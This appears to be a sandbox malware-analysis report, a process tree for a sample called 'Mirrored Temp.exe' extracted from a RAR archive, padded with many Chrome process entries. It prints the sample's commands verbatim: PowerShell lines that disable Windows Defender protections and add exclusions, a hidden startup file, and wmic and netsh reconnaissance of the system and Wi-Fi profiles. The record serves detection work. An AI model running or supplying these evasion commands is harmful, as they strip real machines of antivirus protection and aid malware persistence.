PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 4824	1976	chrome.exe	86
PID 1976 wrote to memory of 2860	1976	chrome.exe	87
PID 1976 wrote to memory of 2860	1976	chrome.exe	87
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88
PID 1976 wrote to memory of 3884	1976	chrome.exe	88

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5912	attrib.exe
3036	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Mirrored Temp.rar"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3420
- C:\Users\Admin\AppData\Local\Temp\7zOC5D35F78\Mirrored Temp.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOC5D35F78\Mirrored Temp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1136
- - C:\Users\Admin\AppData\Local\Temp\7zOC5D35F78\Mirrored Temp.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOC5D35F78\Mirrored Temp.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
      4⤵
      PID:4108
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "start bound.exe"
      4⤵
      PID:3076
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4560
      - C:\Users\Admin\AppData\Local\Temp\._cache_bound.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_bound.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        Modifies Internet Explorer settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4700
      - C:\ProgramData\Synaptics\Synaptics.exe
        
        "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        Modifies Internet Explorer settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
      4⤵
      PID:1432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\‎   .scr"
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:4836
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\‎   .scr"
        5⤵
        Drops startup file
        Views/modifies file attributes
        
        PID:3036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
      4⤵
      PID:2844
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:940
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3340
  - - C:\Windows\SYSTEM32\netsh.exe
      netsh wlan show profiles
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:868
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2808
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:420
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:2624
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:2420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
      4⤵
      PID:4592
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
        5⤵
        
        PID:2304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
      4⤵
      PID:4560
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path softwarelicensingservice get OA3xOriginalProductKey
        5⤵
        
        PID:3084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:1492
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:1260
- C:\Users\Admin\AppData\Local\Temp\7zOC5D1396B\Mirrored Temp.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOC5D1396B\Mirrored Temp.exe"
  2⤵
  - Executes dropped EXE
  PID:5976
- - C:\Users\Admin\AppData\Local\Temp\7zOC5D1396B\Mirrored Temp.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOC5D1396B\Mirrored Temp.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:1216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
      4⤵
      PID:5292
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "start bound.exe"
      4⤵
      PID:5972
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:5932
      - C:\Users\Admin\AppData\Local\Temp\._cache_bound.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_bound.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        Modifies Internet Explorer settings
        
        PID:5200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
      4⤵
      PID:5712
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ‎ .scr"
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:5280
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ‎ .scr"
        5⤵
        Drops startup file
        Views/modifies file attributes
        
        PID:5912
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
      4⤵
      PID:2024
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1436
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:564
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5480
  - - C:\Windows\SYSTEM32\netsh.exe
      netsh wlan show profiles
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:6032
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:1596
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      4⤵
      PID:5772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5740
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3592
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:3816
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:5768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
      4⤵
      PID:1028
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
        5⤵
        
        PID:5556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
      4⤵
      PID:6040
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path softwarelicensingservice get OA3xOriginalProductKey
        5⤵
        
        PID:1404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:1524
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:1088
- C:\Users\Admin\AppData\Local\Temp\7zOC5DDAF8B\Mirrored Temp.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOC5DDAF8B\Mirrored Temp.exe"
  2⤵
  - Executes dropped EXE
  PID:5988
- - C:\Users\Admin\AppData\Local\Temp\7zOC5DDAF8B\Mirrored Temp.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOC5DDAF8B\Mirrored Temp.exe"
    3⤵
    - Executes dropped EXE
    PID:3480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0x80,0x108,0x7ff84254cc40,0x7ff84254cc4c,0x7ff84254cc58
  2⤵
  PID:4156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1772,i,17578700407708315117,11770452647606615,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1768 /prefetch:2
  2⤵
  PID:4824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2040,i,17578700407708315117,11770452647606615,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2112 /prefetch:3
  2⤵
  PID:2860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2140,i,17578700407708315117,11770452647606615,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2188 /prefetch:8
  2⤵
  PID:3884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,17578700407708315117,11770452647606615,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3136 /prefetch:1
  2⤵
  PID:1648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3100,i,17578700407708315117,11770452647606615,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:3464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4424,i,17578700407708315117,11770452647606615,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4376 /prefetch:1
  2⤵
  PID:1436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4600,i,17578700407708315117,11770452647606615,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4320 /prefetch:1
  2⤵
  PID:2744

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3832

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff8333acc40,0x7ff8333acc4c,0x7ff8333acc58
  2⤵
  PID:4276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:3120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1736,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2112 /prefetch:3
  2⤵
  PID:3036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2000,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2176 /prefetch:8
  2⤵
  PID:756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3112 /prefetch:1
  2⤵
  PID:4500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3160 /prefetch:1
  2⤵
  PID:3268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4416,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4444 /prefetch:1
  2⤵
  PID:2088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3132,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4276 /prefetch:1
  2⤵
  PID:864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4872,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4884 /prefetch:8
  2⤵
  PID:5048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5056 /prefetch:8
  2⤵
  PID:1768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5064 /prefetch:8
  2⤵
  PID:3324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4888,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5084 /prefetch:8
  2⤵
  PID:540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3384,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5056 /prefetch:8
  2⤵
  PID:4436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4404 /prefetch:8
  2⤵
  PID:3672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3176,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3388 /prefetch:2
  2⤵
  PID:1584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4756,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:6124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5256,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5240 /prefetch:1
  2⤵
  PID:6140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3364,i,14599813896664468801,12102821126563601203,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5212 /prefetch:1
  2⤵
  PID:2224
- C:\Program Files\Google\Chrome\Application\chrome.exe
